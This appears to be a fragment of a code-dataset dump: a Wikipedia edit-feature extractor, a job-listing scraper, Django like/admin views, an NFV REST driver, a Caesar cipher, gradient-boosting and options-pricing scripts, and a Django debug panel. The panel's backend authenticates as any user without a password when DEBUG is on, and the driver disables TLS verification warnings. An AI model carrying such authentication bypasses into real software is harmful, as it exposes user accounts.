wikitext.revision.diff.words_added,\n # Measures the size of the change in removed words\n wikitext.revision.diff.words_removed,\n # Measures the proportional change in \"badwords\"\n english.badwords.revision.diff.match_prop_delta_sum,\n # Measures the proportional change in \"informals\"\n english.informals.revision.diff.match_prop_delta_sum,\n # Measures the proportional change meaningful words\n english.stopwords.revision.diff.non_stopword_prop_delta_sum,\n # Is the user anonymous\n revision_oriented.revision.user.is_anon,\n # Is the user a bot or a sysop\n revision_oriented.revision.user.in_group({'bot', 'sysop'}),\n # How long ago did the user register?\n temporal.revision.user.seconds_since_registration\n]\n\napi_extractor = api.Extractor(session)\ntry:\n revData = list(api_extractor.extract(revid, features))\n revObserv = {\"rev_id\": revid, \"cache\": revData}\nexcept:\n print('Revision Data Not Found')\n\n#revObserv = json.dumps(revObserv)\n#print(type(revObserv))\nprint('Revision Id: ' + str(revObserv['rev_id']))\nprint('Repeated Characters Added: ' + str(revObserv['cache'][0]))\nprint('Added Characters: ' + str(revObserv['cache'][1]))\nprint('Removed Characters: ' + str(revObserv['cache'][2]))\nprint('Proportional Number of Bad Words: ' + str(revObserv['cache'][3]))\nprint('Proportional Number of Informal Words: ' + str(revObserv['cache'][4]))\nprint('Proportional Change of Meaningful Words: ' + str(revObserv['cache'][5]))\nprint('User Anonymity: ' + str(revObserv['cache'][6]))\nprint('User Group: ' + str(revObserv['cache'][7]))\nprint('Registration Time: ' + str(revObserv['cache'][8]))","sub_path":"Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"144642082","text":"#zyx\nimport requests\nimport csv\n\nurl = \"https://careers.tencent.com/tencentcareer/api/post/Query\"\n\nheaders = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\",\n}\n\nparams = {'area': ' cn',\n 'attrId': ' ',\n 'bgIds': ' ',\n 'categoryId': ' ',\n 'cityId': ' ',\n 'countryId': ' ',\n 'keyword': ' ',\n 'language': ' zh-cn',\n 'pageIndex': ' 1',\n 'pageSize': ' 10',\n 'parentCategoryId': ' ',\n 'productId': ' ',\n 'timestamp': ' 1602211262824'}\n\n\ndef parse_json(url, params={}):\n \"\"\"解析url,得到字典\"\"\"\n response = requests.get(url=url, headers=headers, params=params)\n return response.json()\n\n\ndef get_position(data):\n \"\"\"获取职位数据\"\"\"\n item = {\n \"postion_name\":\"\",#职位名称\n \"postion_department\":\"\",#职位部门\n \"postion_location\":\"\",#职位所在地\n \"postion_country\":\"\",#职位所在国家\n \"postion_category\":\"\",#职位类别\n \"postion_responsibility\":\"\",#职位职责\n \"postion_url\":\"\",#职位url\n }\n data_list = data[\"Data\"][\"Posts\"]\n for data in data_list:\n item[\"postion_name\"] = data[\"RecruitPostName\"]\n item[\"postion_department\"] = data[\"BGName\"]\n item[\"postion_location\"] = data[\"LocationName\"]\n item[\"postion_country\"] = data[\"CountryName\"]\n item[\"postion_category\"] = data[\"CategoryName\"]\n item[\"postion_responsibility\"] = data[\"Responsibility\"]\n item[\"postion_url\"] = data[\"PostURL\"]\n\n save(item)\n print(item)\n print(\"保存完成\")\n\ndef save(item):\n \"\"\"将数据保存到csv中\"\"\"\n with open(\"./腾讯招聘.csv\", \"a\", encoding=\"utf-8\") as file:\n writer = csv.writer(file)\n writer.writerow(item.values())\n\ndef start():\n for i in range(1,635):\n params[\"pageIndex\"] = i\n data = parse_json(url,params)\n get_position(data)\n\nif __name__ == '__main__':\n start()","sub_path":"pythondemo123/tencent2.py","file_name":"tencent2.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"602287438","text":"from rest_framework import status\nfrom rest_framework import filters\nfrom rest_framework.generics import ListAPIView, CreateAPIView, GenericAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\n\nfrom likes.api.pagination import get_pagination_class\nfrom likes.api.serializers import (\n LikeListSerializer,\n LikeToggleSerializer,\n LikeContentTypeSerializer\n)\nfrom likes.models import Like\nfrom posts.models import Post\nfrom likes.selectors import get_liked_object_ids, get_users_who_liked_object, get_user_likes\nfrom likes.services import get_user_likes_count\n\nfrom posts.serializers import PostSerializer\n\n__all__ = (\n 'LikedCountAPIView',\n 'LikedIDsAPIView',\n 'LikeToggleView',\n 'LikeListAPIView',\n 'LikersListAPIView',\n)\n\n\nclass LikeToggleView(CreateAPIView):\n \"\"\"\n post:\n API View to like-unlike given object by authenticated user.\\n\n Possible payload:\\n\n {\n \"type\": \"app_label.model\", // object's content type's natural key joined string\n \"id\": 1 // object's primary key\n }\n \"\"\"\n permission_classes = (IsAuthenticated, )\n serializer_class = LikeToggleSerializer\n # serializer_class = PostSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n data = serializer.data\n data['is_liked'] = getattr(serializer, 'is_liked', True)\n return Response(\n data,\n status=status.HTTP_201_CREATED,\n headers=self.get_success_headers(serializer.data)\n )\n \nclass LikeAlbumToggleView(CreateAPIView):\n \"\"\"\n post:\n API View to like-unlike given object by authenticated user.\\n\n Possible payload:\\n\n {\n \"type\": \"app_label.model\", // object's content type's natural key joined string\n \"id\": 1 // object's primary key\n }\n \"\"\"\n permission_classes = (IsAuthenticated, )\n serializer_class = LikeToggleSerializer\n # serializer_class = PostSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n data = serializer.data\n data['is_liked'] = getattr(serializer, 'is_liked', True)\n # album = AlbumSerializer()\n return Response(\n data,\n status=status.HTTP_201_CREATED,\n headers=self.get_success_headers(serializer.data)\n )\n\n\n# class LikersListAPIView(ListAPIView):\n# permission_classes = (AllowAny, )\n#\n# def get(self, request, *args, **kwargs):\n# serializer = LikeContentTypeSerializer(data=request.GET)\n# serializer.is_valid(raise_exception=True)\n#\n# return Response(\n# data={\n# 'ids': get_users_who_liked_object(\n# user=self.request.user,\n# content_type=serializer.validated_data.get(\n# 'type'\n# )\n# )\n# }\n# )\n\n\nclass LikedCountAPIView(APIView):\n \"\"\"\n API View to return count of likes for authenticated user.\n \"\"\"\n permission_classes = (AllowAny, )\n\n def get(self, request, *args, **kwargs):\n serializer = LikeContentTypeSerializer(data=request.GET)\n serializer.is_valid(raise_exception=True)\n\n return Response(\n data={\n 'count': get_user_likes_count(\n user=request.user,\n content_type=(\n serializer.validated_data.get(\n 'type'\n )\n )\n )\n }\n )\n\n\nclass LikedIDsAPIView(APIView):\n \"\"\"\n User liked ids:\n API View to return liked objects ids for a given user.\n \"\"\"\n permission_classes = (AllowAny, )\n\n def get(self, request, *args, **kwargs):\n serializer = LikeContentTypeSerializer(data=request.GET)\n serializer.is_valid(raise_exception=True)\n post_serializer = PostSerializer\n return Response(\n data={\n 'ids': get_liked_object_ids(\n user=self.request.user,\n content_type=serializer.validated_data.get(\n 'type'\n )\n ),\n # 'posts': Post.objects.filter(likes__user=self.request.user)\n # 'posts': get_user_likes(user=self.request.user, content_type=post_serializer.validated_data.get('type'))\n }\n )\n #\n\n\nclass PostLikedByList(ListAPIView):\n # queryset = Post.objects.all()\n # serializer_class = PostSerializer\n\n\n # permission_classes = (IsAuthenticated,)\n # lookup_field = 'id'\n # def perform_create(self, serializer):\n # serializer.save(publisher=self.request.user)\n\n # def get_queryset(self):\n\n def get(self, request, id):\n \"\"\"\n /posts/:id/likes/\n \"\"\"\n\n post_id = Post.objects.get(id=id).likes.all()\n serializer = LikeListSerializer(post_id, many=True, context={'request': request})\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass LikeListAPIView(ListAPIView):\n \"\"\"\n List API View to return all likes for authenticated user.\n Possible payload:\\n\n {\n \"type\": \"app_label.model\", // object's content type's natural key joined string\n \"id\": 1 // object's primary key\n }\n \"\"\"\n pagination_class = get_pagination_class()\n permission_classes = (IsAuthenticated, )\n serializer_class = LikeListSerializer\n queryset = Like.objects.all()\n filter_backends = (filters.SearchFilter, )\n search_fields = (\n 'content_type__model',\n )\n\n def get_queryset(self):\n return (\n super()\n .get_queryset()\n .filter(\n user=self.request.user\n )\n .select_related('user')\n .distinct()\n )\n","sub_path":"likes/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"614374893","text":"from django.contrib import admin\nfrom .models import Quote, SchoolRelatedInformation, Subscriber\n\n\nclass QuoteAdmin(admin.ModelAdmin):\n list_display = ('quote', 'author', 'update_date')\n list_filter = ('update_date',)\n search_fields = ('author', 'quote')\n\n\nclass SubscriberAdmin(admin.ModelAdmin):\n list_display = ('email', 'date')\n list_filter = ('date',)\n\n\nadmin.site.register(Quote, QuoteAdmin)\nadmin.site.register(Subscriber, SubscriberAdmin)\nadmin.site.register(SchoolRelatedInformation)\n","sub_path":"home/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"321255453","text":"# Copyright 2020 Ericsson TEI, Fabio Ubaldi\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport copy\nimport logging\nimport os\nimport re\nfrom typing import Dict, Tuple\nfrom urllib.parse import urlencode\n\nimport requests\nimport urllib3\nfrom urllib3.exceptions import InsecureRequestWarning\n\nfrom adaptation_layer.error_handler import ResourceNotFound, NsNotFound, \\\n BadRequest, ServerError, NsOpNotFound, NsdNotFound\nfrom .interface import Driver, Headers, BodyList, Body\n\nurllib3.disable_warnings(InsecureRequestWarning)\nTESTING = os.environ.get(\"TESTING\", False)\nPRISM_ALIAS = os.environ.get(\"PRISM_ALIAS\", \"prism-ever\")\n\nlogger = logging.getLogger('app.driver.ever')\n\nclass EVER(Driver):\n\n def __init__(self, rano_cred):\n self._ranoId = rano_cred[\"rano_id\"]\n self._host = rano_cred[\"host\"]\n self._port = rano_cred[\"port\"] if \"port\" in rano_cred else 8080\n self._headers = {\"Content-Type\": \"application/json\",\n \"Accept\": \"application/json\"}\n\n if TESTING is False:\n self._base_path = 'http://{0}:{1}'.format(self._host, self._port)\n else:\n self._base_path = 'http://{0}:{1}'.format(PRISM_ALIAS, 9999)\n\n def _exec_delete(self, url=None, params=None, headers=None):\n logger.debug('#############execute delete######')\n logger.debug('url= ' + url)\n try:\n resp = requests.delete(url, params=params, verify=False, headers=headers)\n except Exception as e:\n raise ServerError(str(e))\n\n if resp.status_code in (200, 201, 202, 206):\n if 'application/json' in resp.headers['content-type']:\n return resp.json(), resp.headers\n else:\n return resp.text, resp.headers\n elif resp.status_code == 204:\n return None, resp.headers\n elif resp.status_code == 400:\n raise BadRequest()\n elif resp.status_code == 404:\n raise ResourceNotFound()\n else:\n error = resp.json()\n logger.debug('############')\n logger.debug('error: ' + error)\n logger.debug('###########')\n raise ServerError(error)\n\n def _exec_post(self, url=None, data=None, json=None, headers=None):\n logger.debug('#############execute post######')\n logger.debug('url= ' + url)\n try:\n resp = requests.post(url, data=data, json=json, verify=False, headers=headers)\n except Exception as e:\n raise ServerError(str(e))\n\n if resp.status_code in (200, 201, 202, 206):\n try:\n ctype = resp.headers['content-type']\n except KeyError:\n # success but no content\n return None, resp.headers\n if 'application/json' in ctype:\n return resp.json(), resp.headers\n else:\n return resp.text, resp.headers\n elif resp.status_code == 204:\n return None, resp.headers\n elif resp.status_code == 400:\n raise BadRequest()\n elif resp.status_code == 404:\n raise ResourceNotFound()\n else:\n if 'application/json' in resp.headers['content-type']:\n error = resp.json()\n else:\n error = resp.text\n logger.debug('############')\n logger.debug('error: ' + error)\n logger.debug('###########')\n raise ServerError(error)\n\n def _exec_get(self, url=None, params=None, headers=None):\n logger.debug('#############execute get######')\n logger.debug('url= ' + url)\n try:\n resp = requests.get(url, params=params, verify=False, headers=headers)\n except Exception as e:\n raise ServerError(str(e))\n\n if resp.status_code in (200, 201, 202, 206):\n if 'application/json' in resp.headers['content-type']:\n return resp.json(), resp.headers\n else:\n return resp.text, resp.headers\n elif resp.status_code == 204:\n return None, resp.headers\n elif resp.status_code == 400:\n raise BadRequest()\n elif resp.status_code == 404:\n raise ResourceNotFound()\n else:\n error = resp.json()\n logger.debug('############')\n logger.debug('error: ' + error)\n logger.debug('###########')\n raise ServerError(error)\n\n # all methods\n\n def get_ns_list(self, args=None) -> Tuple[BodyList, Headers]:\n _url = '{0}/instances'.format(self._base_path)\n _url = self._build_url_query(_url, args)\n ns_list, resp_headers = self._exec_get(_url, headers=self._headers)\n headers = self._build_headers(resp_headers)\n return ns_list, headers\n\n def create_ns(self, args=None) -> Tuple[Body, Headers]:\n _url = '{0}/create'.format(self._base_path)\n _url = self._build_url_query(_url, args)\n try:\n created_ns, resp_headers = self._exec_post(\n _url, json=args['payload'], headers=self._headers)\n except ResourceNotFound:\n nsd_Id = args['payload']['nsdId']\n raise NsdNotFound(nsd_id=nsd_Id)\n headers = self._build_headers(resp_headers)\n return created_ns, headers\n\n def get_ns(self, nsId: str, args=None, skip_sol=False) -> Tuple[Body, Headers]:\n _url = '{0}/instances/{1}'.format(self._base_path, nsId)\n _url = self._build_url_query(_url, args)\n try:\n ns_instance, resp_headers = self._exec_get(_url, headers=self._headers)\n except ResourceNotFound:\n raise NsNotFound(ns_id=nsId)\n headers = self._build_headers(resp_headers)\n return ns_instance, headers\n\n def delete_ns(self, nsId: str, args: Dict = None) -> Tuple[None, Headers]:\n _url = '{0}/delete/{1}'.format(self._base_path, nsId)\n _url = self._build_url_query(_url, args)\n try:\n empty_body, resp_headers = self._exec_delete(\n _url, params=None, headers={})\n except ResourceNotFound:\n raise NsNotFound(ns_id=nsId)\n headers = self._build_headers(resp_headers)\n return None, headers\n\n def instantiate_ns(self, nsId: str, args=None) -> Tuple[None, Headers]:\n _url = '{0}/instantiate/{1}'.format(self._base_path, nsId)\n _url = self._build_url_query(_url, args)\n instantiate_payload = {}\n try:\n instantiate_payload['SapData'] = args['payload']['SapData']\n except (TypeError, KeyError):\n logger.info('no SapData')\n try:\n empty_body, resp_headers = self._exec_post(\n _url, json=instantiate_payload, headers={})\n except ResourceNotFound:\n raise NsNotFound(ns_id=nsId)\n headers = self._build_headers(resp_headers)\n return None, headers\n\n def terminate_ns(self, nsId: str, args=None) -> Tuple[None, Headers]:\n _url = '{0}/terminate/{1}'.format(self._base_path, nsId)\n _url = self._build_url_query(_url, args)\n req_headers = copy.deepcopy(self._headers)\n try:\n del req_headers[\"Content-Type\"]\n except KeyError:\n pass\n try:\n del req_headers[\"Accept\"]\n except KeyError:\n pass\n try:\n emtpy_body, resp_headers = self._exec_post(_url, headers=req_headers)\n except ResourceNotFound:\n raise NsNotFound(ns_id=nsId)\n headers = self._build_headers(resp_headers)\n return None, headers\n\n def scale_ns(self, nsId: str, args=None) -> Tuple[None, Headers]:\n pass\n\n def get_op_list(self, args: Dict = None) -> Tuple[BodyList, Headers]:\n _url = \"{0}/ns_lcm_op_occs\".format(self._base_path)\n _url = self._build_url_query(_url, args)\n op_list, resp_headers = self._exec_get(_url, headers=self._headers)\n headers = self._build_headers(resp_headers)\n return op_list, headers\n\n def get_op(self, nsLcmOpId, args: Dict = None) -> Tuple[Body, Headers]:\n _url = '{0}/ns_lcm_op_occs/{1}'.format(self._base_path, nsLcmOpId)\n _url = self._build_url_query(_url, args)\n try:\n lcm_op, resp_headers = self._exec_get(_url, headers=self._headers)\n except ResourceNotFound:\n raise NsOpNotFound(ns_op_id=nsLcmOpId)\n headers = self._build_headers(resp_headers)\n return lcm_op, headers\n\n @staticmethod\n def _build_url_query(base, args):\n if args and args['args']:\n url_query = urlencode(args['args'])\n return \"{0}?{1}\".format(base, url_query)\n return base\n\n def _build_headers(self, resp_headers):\n headers = {}\n if 'location' in resp_headers:\n re_res = re.findall(\n r\"/(instances|ns_lcm_op_occs)/([A-Za-z0-9\\-]+)\", resp_headers['location'])\n if len(re_res):\n headers['location'] = '/rano/{0}/ns_lcm_op_occs/{1}'.format(self._ranoId, re_res[0][1])\n return headers\n","sub_path":"adaptation_layer/driver/ever.py","file_name":"ever.py","file_ext":"py","file_size_in_byte":9580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457340374","text":"import sys\n\ndef ask_for_type():\n decided = False\n while decided == False:\n enc_or_dec = input(\"Do you want to (e)ncode or (d)ecode a word?\\n\")\n enc_or_dec = enc_or_dec.lower()\n\n if enc_or_dec == 'e':\n encode = True\n decided = True\n elif enc_or_dec == 'd':\n encode = False\n decided = True\n else:\n print(\"Invalid input, try again...\")\n return encode\n\ndef ask_for_word():\n word = input(\"Which word shall I process?\\n\")\n return word\n\ndef ask_for_key():\n key = input(\"With which key shall I process the word?\\n\")\n return int(key)\n\ndef encode(word, key, enc):\n if enc == False:\n key = -key\n new_word = []\n for c in word:\n if c.isupper() == True:\n ascii_shift = 65\n else: # lowercase char\n ascii_shift = 97\n number = ord(c) - ascii_shift\n key_transformed = (number + key) % 26\n final_character = chr(key_transformed + ascii_shift)\n new_word.append(final_character)\n return ''.join(new_word)\n\n\n# main\n\nprint(\"Welcome to caesar cypher!\")\nenc = ask_for_type()\nword = ask_for_word()\nkey = ask_for_key()\noutput = encode(word, key, enc)\nprint(output)\n","sub_path":"easy/003/caesarcypher.py","file_name":"caesarcypher.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"204263610","text":"import numpy as np\nimport matplotlib.pylab as plt\nimport decision_tree_library\n\n# Gradient boosting: gather an ensemble of weak learners (trees).\n# Each new learner learns what all previous learners missed\n# to learn: each new learner uses residual (= initial target - best\n# previous prediction) as target.\n\ndef generate_data():\n # Generate 1D dataset.\n x = np.arange(0, 50)\n a, b = 30, 20\n y = a*x + b\n sigma = 100.\n y = np.random.normal(y, sigma, size=y.shape)\n\n # Shape data.\n x = x.reshape(-1, 1)\n y = y.reshape(-1, 1)\n\n return x, y\n\ndef gradient_boosting_training(x_train, y_train):\n # Gradient boosting: training (skeleton algorithm).\n grad_boost = []\n y_pred_cumulated = np.zeros(y_train.shape)\n residual = y_train # Initialize residuals to y_train.\n max_depth, learning_rate, n_estimators = 10, 0.1, 50\n for i in range(n_estimators):\n # Gradient boosting: i-th step.\n train_set = np.concatenate((x_train, residual), axis=1) # Use residual as target.\n if i == 0: # First tree is a leaf (max_depth = 1).\n lr = 1. # Learning rate is always 1. for the first tree (= leaf).\n tree = decision_tree_library.build_tree(train_set, 1, 2, False)\n else:\n lr = learning_rate\n tree = decision_tree_library.build_tree(train_set, max_depth, 2, False)\n grad_boost.append((lr, tree))\n y_pred = np.zeros(y_train.shape)\n for idx, row in enumerate(train_set):\n pred = decision_tree_library.predict_tree(tree, row)\n y_pred[idx] = pred\n y_pred_cumulated = y_pred_cumulated + lr*y_pred\n residual = y_train - y_pred_cumulated # Use residual as target.\n\n # Plotting results: i-th step.\n if i%10 == 0 or i == n_estimators-1:\n _, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(15, 5))\n ax1.scatter(x_train, y_train, c='k', label='data')\n ax1.set_title('Data')\n ax1.set_xlabel('x')\n ax1.set_ylabel('y')\n ax1.legend()\n ax2.scatter(x_train, y_train, c='k', label='data')\n ax2.scatter(x_train, y_pred_cumulated, c='b', label='predict')\n ax2.set_title(f'Prediction (Iteration {i+1})')\n ax2.set_xlabel('x')\n ax2.set_ylabel('y')\n ax2.legend()\n ax3.scatter(x_train, residual, c='r', label='residual')\n ax3.set_title(f'Residuals vs. x (Iteration {i+1})')\n ax3.set_xlabel('x')\n ax3.set_ylabel('Residuals')\n ax3.legend()\n plt.suptitle('Gradient Boosting - Training')\n plt.show()\n\n return grad_boost\n\ndef gradient_boosting_testing(grad_boost, x_test, y_test):\n # Gradient boosting: testing.\n test_set = np.concatenate((x_test, y_test), axis=1)\n y_pred = np.zeros(y_test.shape)\n for idx, row in enumerate(test_set):\n for gb in grad_boost:\n lr, tree = gb\n pred = decision_tree_library.predict_tree(tree, row)\n y_pred[idx] = y_pred[idx] + lr*pred\n\n # Plotting.\n _, ax = plt.subplots(1, 1, figsize=(5, 5))\n ax.scatter(x_test, y_test, c='k', label='data')\n ax.scatter(x_test, y_pred, c='b', label='predict')\n ax.set_title('Prediction')\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.legend()\n plt.suptitle('Gradient Boosting - Testing')\n plt.show()\n\ndef main():\n # Gradient boosting: training.\n x_train, y_train = generate_data()\n grad_boost = gradient_boosting_training(x_train, y_train)\n\n # Gradient boosting: testing.\n x_test, y_test = generate_data()\n gradient_boosting_testing(grad_boost, x_test, y_test)\n\nif __name__ == '__main__':\n main()\n","sub_path":"1.supervised/3.decision_tree/gradient_boosting_regression.py","file_name":"gradient_boosting_regression.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"342655260","text":"import datetime as dt\nimport pandas as pd\nimport ctypes\nimport yfinance as yf\nimport openpyxl\nimport concurrent.futures\n\n\nclass Options:\n def __init__(self, stock_tickers=None, initial_data=None, quote_data=None, rate=None):\n self.stock_tickers = stock_tickers\n self.initial_data = initial_data\n self.quote_data = quote_data\n self.rate = rate\n self.option_value = {}\n for ticker in stock_tickers:\n self.option_value[ticker] = []\n\n def thread_marshaller(self):\n with concurrent.futures.ThreadPoolExecutor(max_workers=len(self.stock_tickers)) as executor:\n for stock in self.stock_tickers:\n executor.submit(self.options, stock)\n\n return self.option_value\n\n def options(self, stock):\n today = dt.date.today()\n url = f\"../ALGO/Daily Stock Analysis/Options/{stock} Options Data {today}.xlsx\"\n\n handle = ctypes.cdll.LoadLibrary(r\"C:\\Users\\fabio\\source\\repos\\CallPricingDll\\CallPricingDll\\x64\\Rel\"\n r\"ease\\CallPricingDll.dll\")\n\n handle.CallPricing.argtypes = [ctypes.c_float, ctypes.c_float, ctypes.c_float, ctypes.c_float,\n ctypes.c_float]\n handle.CallPricing.restype = ctypes.c_double\n handle.PutPricing.argtypes = [ctypes.c_double, ctypes.c_double, ctypes.c_double, ctypes.c_double,\n ctypes.c_double]\n handle.PutPricing.restype = ctypes.c_double\n\n wb = openpyxl.Workbook()\n wb.save(url)\n book = openpyxl.load_workbook(url)\n writer = pd.ExcelWriter(url, engine='openpyxl')\n writer.book = book\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\n try:\n i = 0\n yfticker = yf.Ticker(stock)\n expiration_dates = yfticker.options\n dividend = self.initial_data[stock][0]\n spot = self.quote_data[stock][0]\n\n for expiry in expiration_dates:\n exp = dt.datetime.strptime(expiry, '%Y-%m-%d').date()\n days_expiration = exp - today\n time_to_expiry = int(days_expiration.days)\n\n bond_yield = float(self.rate[0])\n if 30 <= time_to_expiry <= 60:\n bond_yield = float(self.rate[1])\n elif 60 < time_to_expiry <= 91:\n bond_yield = float(self.rate[2])\n elif 91 < time_to_expiry <= 182:\n bond_yield = float(self.rate[3])\n elif time_to_expiry > 182:\n continue\n\n options_chain = yfticker.option_chain(expiry)\n call_table = options_chain.calls\n put_table = options_chain.puts\n call_table['option_value'] = 0.00\n put_table['option_value'] = 0.00\n\n self.option_value[stock].append({expiry: {'overvalued_call_options': 0, 'undervalued_call_options': 0,\n 'overvalued_put_options': 0, 'undervalued_put_options': 0}})\n # calls_well_priced = 0\n # total_calls = 0\n # puts_well_priced = 0\n # total_puts = 0\n\n bond_yield -= dividend # dividend should be factored in\n bond_yield -= 0.02 # nominal inflation rate\n\n for index, row in call_table.iterrows():\n sigma = row['impliedVolatility']\n if sigma < 0.0001 or row['bid'] < 0.05 or row['volume'] < 10 or row['openInterest'] < 10:\n continue\n\n strike = row['strike']\n option_price = handle.CallPricing(spot, strike, bond_yield, time_to_expiry, sigma)\n\n call_table.at[index, 'option_value'] = option_price\n spread = (row['bid'] + row['ask']) / 2\n call_table.at[index, 'lastPrice'] = spread\n\n # error = ((option_price - spread) / spread)\n # if -0.05 < error < 0.05:\n # calls_well_priced += 1\n # total_calls += 1\n\n if option_price > spread:\n self.option_value[stock][i][expiry]['undervalued_call_options'] += 1\n if option_price < spread:\n self.option_value[stock][i][expiry]['overvalued_call_options'] += 1\n\n for index, row in put_table.iterrows():\n sigma = row['impliedVolatility']\n if sigma == 0.00 or row['bid'] < 0.05 or row['volume'] < 10 or row['openInterest'] < 10:\n continue\n strike = row['strike']\n\n option_price = handle.PutPricing(spot, strike, bond_yield, time_to_expiry, sigma)\n\n put_table.at[index, 'option_value'] = float(option_price)\n spread = (row['bid'] + row['ask']) / 2\n put_table.at[index, 'lastPrice'] = spread\n\n # error = ((option_price - spread) / spread)\n # if -0.05 < error < 0.05:\n # puts_well_priced += 1\n # total_puts += 1\n\n if option_price > spread:\n self.option_value[stock][i][expiry]['undervalued_put_options'] += 1\n if option_price < spread:\n self.option_value[stock][i][expiry]['overvalued_put_options'] += 1\n\n # pct_well_priced = (calls_well_priced / total_calls) * 100\n # pct_well_priced_2 = (puts_well_priced / total_puts) * 100\n # print(f\"{round(pct_well_priced, 2)}% of calls well priced (within 5% of the bid/ask spread) \"\n # f\"for {stock} options expiring {expiry}\")\n # print(f\"{round(pct_well_priced_2, 2)}% of puts well priced (within 5% of the bid/ask spread) \"\n # f\"for {stock} options expiring {expiry}\")\n i += 1\n call_table.to_excel(writer, sheet_name=f'{stock} Calls {expiry}')\n put_table.to_excel(writer, sheet_name=f'{stock} Puts {expiry}')\n except Exception as e:\n print(e)\n finally:\n try:\n sheet = book['Sheet']\n book.remove(sheet)\n except KeyError:\n pass\n book.save(url)\n","sub_path":"Algorithmic Trader Project/module/options_pricing.py","file_name":"options_pricing.py","file_ext":"py","file_size_in_byte":6477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"20151649","text":"from debug_toolbar.panels import DebugPanel\nfrom django.contrib.auth.models import User, Group\n#from django.template.context import get_standard_processors\nfrom django.template.loader import render_to_string\n\ndef get_debug_users():\n \"\"\"\n Returns a list if context switchable users based on the criteria outlined\n in settings\n \"\"\"\n users = User.objects.all()\n\n try:\n from settings import DEBUG_TOOLBAR_CONFIG\n if 'USER_EXCLUDE' in DEBUG_TOOLBAR_CONFIG:\n users = users.exclude(**DEBUG_TOOLBAR_CONFIG['USER_EXCLUDE'])\n if 'USER_INCLUDE' in DEBUG_TOOLBAR_CONFIG:\n users = users.filter(**DEBUG_TOOLBAR_CONFIG['USER_INCLUDE'])\n except:\n pass\n \n return users\n\nclass UserDebugPanel(DebugPanel):\n \"\"\"\n A panel to show info about the current user and allow to switch user\n access.\n \"\"\"\n\n name = 'User'\n has_content = True\n\n def title(self):\n return 'Users'\n\n def url(self):\n return ''\n\n def process_request(self, request):\n self.request = request\n\n def content(self):\n\n\n\n groups = Group.objects.all()\n context = {\n 'groups': groups,\n 'active_user': self.request.user,\n 'all_users': get_debug_users(),\n }\n return render_to_string('debug_toolbar/panels/users.html', context)\n\n def get_custom_permissions(self):\n\n from django.contrib.contenttypes.models import ContentType\n# from django.contrib.auth.models import Permission\n from django.db.models import get_models\n\n permissions = []\n\n for klass in get_models():\n if klass._meta.permissions:\n ctype = ContentType.objects.get_for_model(klass)\n permissions.append((ctype, klass._meta.permissions ))\n\n return permissions\n#from django.conf import settings\nfrom settings import DEBUG\n\nclass UserDebugPanelAuthentication:\n\n \"\"\"\n This authentication module will accept any login so long as the\n settings.DEBUG variable is set to True.\n \"\"\"\n def authenticate(self, user_id=None):\n try:\n from settings import DEBUG_TOOLBAR_PANELS\n except:\n return None\n\n if not DEBUG \\\n or not 'debug_toolbar.panels.user.UserDebugPanel' \\\n in DEBUG_TOOLBAR_PANELS:\n assert False\n return None\n\n return User.objects.get(pk=user_id)\n\n def get_user(self, user_id):\n try:\n return User.objects.get(pk=user_id)\n except User.DoesNotExist:\n return None\n\n","sub_path":"debug_toolbar/panels/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"107079045","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom nltk.corpus import cess_esp as cess\nfrom nltk import UnigramTagger as ut\n\nimport pandas as pd\nfrom scipy import spatial\nimport numpy as np\nfrom sklearn.metrics import pairwise_distances\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy.spatial.distance import cosine\nimport nltk\n\ndef getPOSFromResponse(string):\n # li = list(string.split(\" \"))\n string = str(string).replace(\"

\", \"\").replace(\"

